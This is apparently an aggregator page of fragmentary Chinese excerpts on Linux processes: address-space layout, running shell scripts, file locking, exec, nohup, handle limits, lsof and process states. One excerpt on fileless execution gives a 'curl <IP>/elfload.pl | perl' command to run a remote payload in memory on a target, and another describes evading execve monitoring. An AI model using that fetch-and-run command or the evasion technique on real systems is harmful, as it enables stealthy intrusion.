Linux可执行文件与进程的虚拟地址空间 一个可执行文件被执行的同时也伴随着一个新的进程的创建。...Linux会为这个进程创建一个新的虚拟地址空间,然后会读取可执行文件的文件头,建立虚拟地址空间与可执行文件的映射关系,然后将CPU的指令指针寄存器设置成可执行文件的入口地址,然后CPU就会从这里取指令执行...Proc目录下的进程虚拟地址空间布局 Linux在装载可执行文件的时候,会将这些segment映射到进程的地址空间中。映射的时候,这里面的segment会对应一个VMA。...Linux将进程虚拟地址空间中的一个段叫做虚拟内存区域(VMA)。在/proc目录下,可以查看一个进程的虚拟地址空间,通过命令 cat /proc/pid/maps ?...ELF可执行文件与进程虚拟地址空间的映射关系 ? 很明显,属性相同或相似的section会被归类到一个segment,并且被映射到同一个VMA。 ?
/hello.sh【hello.sh必须有x权限】 二、直接sh 加上文件名.sh,如运行hello.sh为sh hello.sh【hello.sh可以没有x权限】 方法一:绝对路径执行.sh文件...到.sh文件所在目录 比如以hello.sh文件为例,如下 2、给.sh文件添加x执行权限 比如以hello.sh文件为例,chmod u+x hello.sh,如下图 3、..../执行.sh文件 比如以hello.sh文件为例,..../hello.sh 即可执行hello.sh文件,如下图 4、sh 执行.sh文件 以hello.sh文件为例,sh hello.sh即可执行hello.sh文件,如下图 注:用“./”加文件名.sh...执行时,必须给.sh文件加x执行权限
在MySQL下执行: source /home/jiangxingqi/DB/hello world.sql
将字符串写会文件 当多个进程同时执行这个过程的时候,就会出现racing:竞争条件, 多个进程可能同时从文件独到同一个数字,并且分别对同一个数字加1并写回, 导致多次写回的结果并不是我们最终想要的累积结果...于是三个进程都是给0加1,然后写了个1回到文件。其他进程以此类推,每次100个进程的执行顺序可能不一样,于是结果是每次得到的值都可能不太一样,但是一定都少于产生的实际进程个数。...此时子进程flock的时候会阻塞,让进程的执行一直停在这。这才是我们使用文件锁之后预期该有的效果。而相同的程序使用lockf却不会这样。这个原因在于flock和lockf的语义是不同的。...在子进程刚开始执行的时候,父子进程的描述符关系实际上跟在一个进程中使用dup复制文件描述符的状态一样(参见《UNIX环境高级编程》8.3节的文件共享部分)。...在子进程不用open重新打开文件的情况下,进程执行仍然被阻塞在子进程lockf加锁的操作上。
大家好,又见面了,我是你们的朋友全栈君。 创建sh后缀文件: touch test.sh #!
创建sh后缀文件: touch test.sh #!
01 简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/...02 技术核心 这里向大家介绍一个linux系统的底层调用函数memfd_create(2),它在内核3.17中引入,会创建一个匿名文件并返回一个文件描述符指向它,该文件表现和常规文件类同, 可以进行修改...第三部分就是执行该文件了,调用exec函数执行该匿名文件 ? 这里我们最后的EXP就生产好了,我们可以目标机上执行 curl 192.168.1.138/elfload.pl | perl ? ?...可以看到我们的elf文件最终以匿名文件的方式在内存中被加载执行了,从匿名文件运行的程序与运行于普通文件的程序之间唯一真正的区别是/proc/pid/exe符号链接。...原作者还使用了fork函数进行了一些进程操作,有兴趣的同学可以去了解一下。
前言 良好的习惯是人生产生复利的有力助手。 继续2020年的flag,至少每周更一篇文章,今天讲linux无文件执行。...无文件执行 之前的文章中,我们讲到了无文件执行的方法以及混淆进程参数的方法,今天我们继续讲解一种linux无文件执行的技巧,是后台朋友给我的提醒,万分感谢,又学到了新的东西。...linux无文件执行,首先要提到两个函数:memfd_create 和 fexecve。...大家可以看到shmopen 其实是在/dev/shm创建文件,而execve的执行文件为/proc/self/fd/3,为进程中打开的文件符号链接,这个指向的就是shm_open创建的文件,但是从监控execve...的角度来说, execve无法获取执行文件的路径,从而实现了混淆。
关键命令 : nohup python test.py Ctrl +Z jobs fg %1 关闭终端进程继续执行 或者 # nohup python test.py & 注意,将nohup后的进程放到后台执行是关键一步...原因: 后台进程退出是由于登陆shell收到了SIGHUP信号后在退出前将SIGHUP转发给所有的作业(jobs)。...命令: nohup :(no hang up) 将其后的脚本命令在关闭终端或退出账户后继续执行,并且它会把标准输出(STDOUT)和标准错误(STDERR)结果输出到nohup.txt文件保存在执行脚本所在目录
linux获取进程执行时间有两种方法可以获取,第一种是用time命令,time 进程。...第二种是通过在程序中进行记录,首先利用sysconf函数获取时钟滴答数,再用times获取tms结构,详细看下面的示例代码 1、前言 测试一个程序的执行时间,时间包括用户CPU时间、系统CPU时间、时钟时间...之前获取之前时间都是在程序的main函数用time函数实现,这个只能粗略的计算程序的执行时间,不能准确的获取其他时间。在看《APUE》时,书中有关程序时间测试程序,非常正规,提供这三个时间。...2、获取方法 有两种方法可以获取,第一种是用time命令,time 进程。第二种是通过在程序中进行记录,首先利用sysconf函数获取时钟滴答数,再用times获取tms结构。...,需要除以系统时钟滴答数,得出实际的秒数。
在 Linux 中,子进程在创建后可以通过 exec 系列系统调用执行一个全新的程序。 这种情况下,子进程会替换原有的代码和数据段,运行一个新的可执行程序,但它的进程 ID(PID)保持不变。...子进程执行新程序的流程如下: 创建子进程:使用 fork() 创建子进程。 调用 exec:在子进程中调用 exec 执行新程序。...父进程继续执行:父进程保持不变,继续执行它的代码,直到调用 wait() 等待子进程结束。 exec 系列函数通过不同的方式传递参数和环境变量,能够实现灵活的程序替换。...它会在 PATH 环境变量指定的目录中搜索可执行文件。...0; } 子进程执行新程序时,可以通过 exec 系列系统调用替换子进程的内存空间,执行新的二进制程序。
1 进程总览 进程是对逻辑的抽象,我们从操作系统的书籍中对进程有了很多的认识,但是对进程的实现可能不太了解,这篇文章尝试解释一下关于进程实现的大致原理。...2 进程的执行 当系统创建一个进程之后,会设置cs:ip寄存器的值,如果是fork,则ip就是fork函数后面的语句的ip地址。如果是execute则ip地址由编译器指定。...不管怎样,当进程开始执行的时候,cpu就会解析cs:ip拿到一条指令去执行。那么cs:ip是如何被解析的呢?...执行进程的时候,tss选择子(GDT索引)被加载到tss寄存器,然后把tss里的上下文也加载到对应的寄存器,比如cr3,ldt选择子。...,然后把链表的头指针指向当前进程, 然后切换到其他进程执行,当被wake_up唤醒的时候,wake_up会唤醒链表的第一个 睡眠节点,因为第一个节点里保存了后面一个节点的地址
在 Linux 平台上运行的进程都会从系统资源申请一定数量的句柄,而且系统控制了进程能够申请的最大句柄数量。...在 Linux 系统中,进程与文件之间是通过“打开文件”操作建立连接,文件系统会返回文件句柄来唯一标识进程与文件的连接。每当一个进程执行完毕之后,Linux 系统会将与进程相关的文件句柄自动释放。...但是,如果进程一直处于执行状态,文件的句柄只能通过“关闭文件”操作来自我释放。...与 Windows 系统的设置不同,Linux 系统对进程可以调用的文件句柄数做了限制,在默认情况下,每个进程可以调用的最大句柄数为 1024 个。超过了这个数值,进程则无法获得新的句柄。...因此,句柄的泄露将会对进程的功能失效造成极大的隐患。 如何修改系统最大句柄数 Linux 中,单个进程能够打开的最大文件句柄数量是可以配置的,系统默认是 1024。
1.介绍 ---- ulimit 命令提供了针对 shell和或由该 shell 启动的进程占用资源的控制。 持久化修改生效是在/etc/security/limits.conf中进行数据写入....写入的格式为: domain:用户名/用户组名/其他(查看man limits.conf) type: hard / soft ,分别指实际最大值类型和预警值类型...maxsyslogins/priority/locks/sigpending/msgqueue/nice/rtprio/ value: -1/unlimited/infinity/ 具体值 要修改最大文件描述符重点在于...item和value 2.修改 ---- 2.1 先查看当前用户最大文件描述符数量: 1 ulimit -Hn 2 ulimit -Sn 2.2 修改当前用户进程的最大文件描述符数量: 1 vim...在末尾添加 3 user soft nofile 4096 (user为用户名) 4 user hard nofile 10240 5 保存后退出登录再重新登录 6 使用上面的命令查看新的limit
用户管理 口令文件 /etc/passwd 影子口令文件 /etc/shadow 组账号文件 /etc/group 组口令文件 /etc/gshadow ?...userdel [-r] //删除 userdel xiaohong 如果加参数-r ,表示在删除用户的同时,一并把用户的家目录及本地邮件存储的目录或文件也一同删除 组管理 groupadd...ls列出的条目信息: -rw-r--r-- 1 anyone anyone 0 7月 3 14:32 test.txt r:读权限 w:写权限 x:执行权限 属主、同组人、其他人 改变所属用户...chmod u=rw test.txt 改文件所属组 必要参数: -c 当发生改变时输出调试信息 -f 不显示错误信息 -R 处理指定目录以及其子目录下的所有文件 -v 运行时显示详细的处理信息 chgrp...-R dierzu text.txt //将文件text.txt 的所属已更改为 dierzu 进程管理 查看进程 ps -elf 实时查看进程:top 杀死进程 kill pid
1.lsof简介 lsof(list open files)是一个列出当前系统打开文件的工具。在linux环境下,任何事物都以文件的形式存在,通过文件不仅仅可以访问常规数据,还可以访问网络连接和硬件。...:进程的名称 PID:进程标识符 USER:进程所有者 FD:文件描述符,应用程序通过文件描述符识别该文件。...例如,linux限制了进程能够打开文件的数目。通常这个数值很大,所以不会产生问题,并且在需要时,应用程序可以请求更大的值(直到某个上限)。...二、恢复删除的文件 当Linux计算机受到入侵时,常见的情况是日志文件被删除,以掩盖攻击者的踪迹。管理错误也可能导致意外删除重要的文件,比如在清理旧日志时,意外地删除了数据库的活动事务日志。...所以lsof 可以显示进程的文件描述符和相关的文件名等信息。也就是我们通过访问进程的文件描述符可以找到该文件的相关信息。
一、进程与可执行程序之间关系的理解 系统会将此时在系统运行的进程的各种属性都以文件的形式给你保存在系统的proc目录下。...当前我的myprocess程序正在运行 而此时我将其对应的可执行程序删掉 这个进程所对应的可执行程序已经被语法高亮了,证明已经被删掉了 而此时我的可执行程序仍在运行,这也从侧面证明了当一个进程运行起来的时候...从上面的截图中我们也可以看到,/proc目录下的虚拟文件系统是会记录下进程的工作目录和对应可执行程序的路径,/proc目录下记录的进程信息与PCB中的某些信息有重叠,比如说PCB中同样也会记录下进程的工作目录和对应可执行程序的路径...这和linux中的虚拟地址有关,也就是说,一个变量可以指向不同的地址空间。 写实拷贝 任意进程之间是具有独立性的,不会互相影响。...进程都有自己的代码和数据,系统创建出来的子进程的PCB默认就会指向父进程的代码和数据,想让父子进程分别执行不同的程序,那就可以在代码中根据父子进程fork返回值的不同设置ifelse语句,让父子进程分别执行不同的代码
前言:在了解完冯诺依曼体系结构和操作系统之后,我们进入了Linux的下一篇章Linux进程,但在学习Linux进程之前,一定要阅读理解上一篇内容,理解“先描述,再组织”才能更好的理解进程的含义。...Linux进程学习基础 本篇主要内容: 进程的概念 通过系统调用获取进程标示符 1....进程的概念 在学习进程之前,大家对进程肯定初步的了解,那么今天我们来深入了解一下 基本概念: 课本概念:程序的一个执行实例,正在执行的程序等 内核观点:担当分配系统资源(CPU时间,内存)的实体。...因为在grep指令发挥作用时,也会形成一个mytest文件 我们直接查看进程并不能知道每个数据表达的意思,所以我们可以加上: 指令:ps ajx | head -1 来查看每一行的信息 指令...:ps ajx | head -1 && ps ajx | grep 可执行程序 2.2 终止进程 在我们刚接触Linux时,通常按CTRL+c可以结束进程,现在在学习Linux进程时,还有一种方法可以杀死进程
本篇主要内容: 操作系统中的进程状态 Linux下的进程状态 在开始之前,我们先来简单了解以下进程状态 进程的本质就是PCB中的一个变量!!! 所谓状态变化,本质就是修改整形变量!!!...,因为这个是必然的,而现在首要任务是让操作系统能继续执行下去!...此时,恰好系统内的内存资源已经严重不足了,系统压力太大,Linux在是在没办法时候,会通过杀掉进程,节省资源的,来不及进程反应直接被系统 “干掉” 。...在执行程序时在末尾加上 & 通过视频我们来更直观的了解二者的区别 后台进程与前台进程 停止状态 T (stopped) 在进程访问软件资源的时候可能暂时不让进程进行访问,就将进程设置为STOP t...总结 在了解Linux中进程的分类时,我们通常是先了解操作系统的进程,因为二者有一定的联系,了解操作系统能更好理解进程在操作系统中的运行关系。进程状态在进程中也极为重要,希望大家能理解透彻!
在Linux中添加动态库路径可以设置LD_LIBRARY_PATH路径。...-Wl为gcc的参数,表示「编译器将后面的参数传递给链接器ld」。 -rpath为在运行链接时,会优先搜索-rpath的路径。...QMake写法1: QMAKE_LFLAGS为指定传递给链接器的一组常规标志。...QMAKE_LFLAGS += -Wl,-rpath=/mylib1 QMake写法2: QMAKE_RPATHDIR为指定在链接时添加到可执行文件的库路径列表,以便在运行时优先搜索这些路径。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
腾讯会议
云直播
对象存储
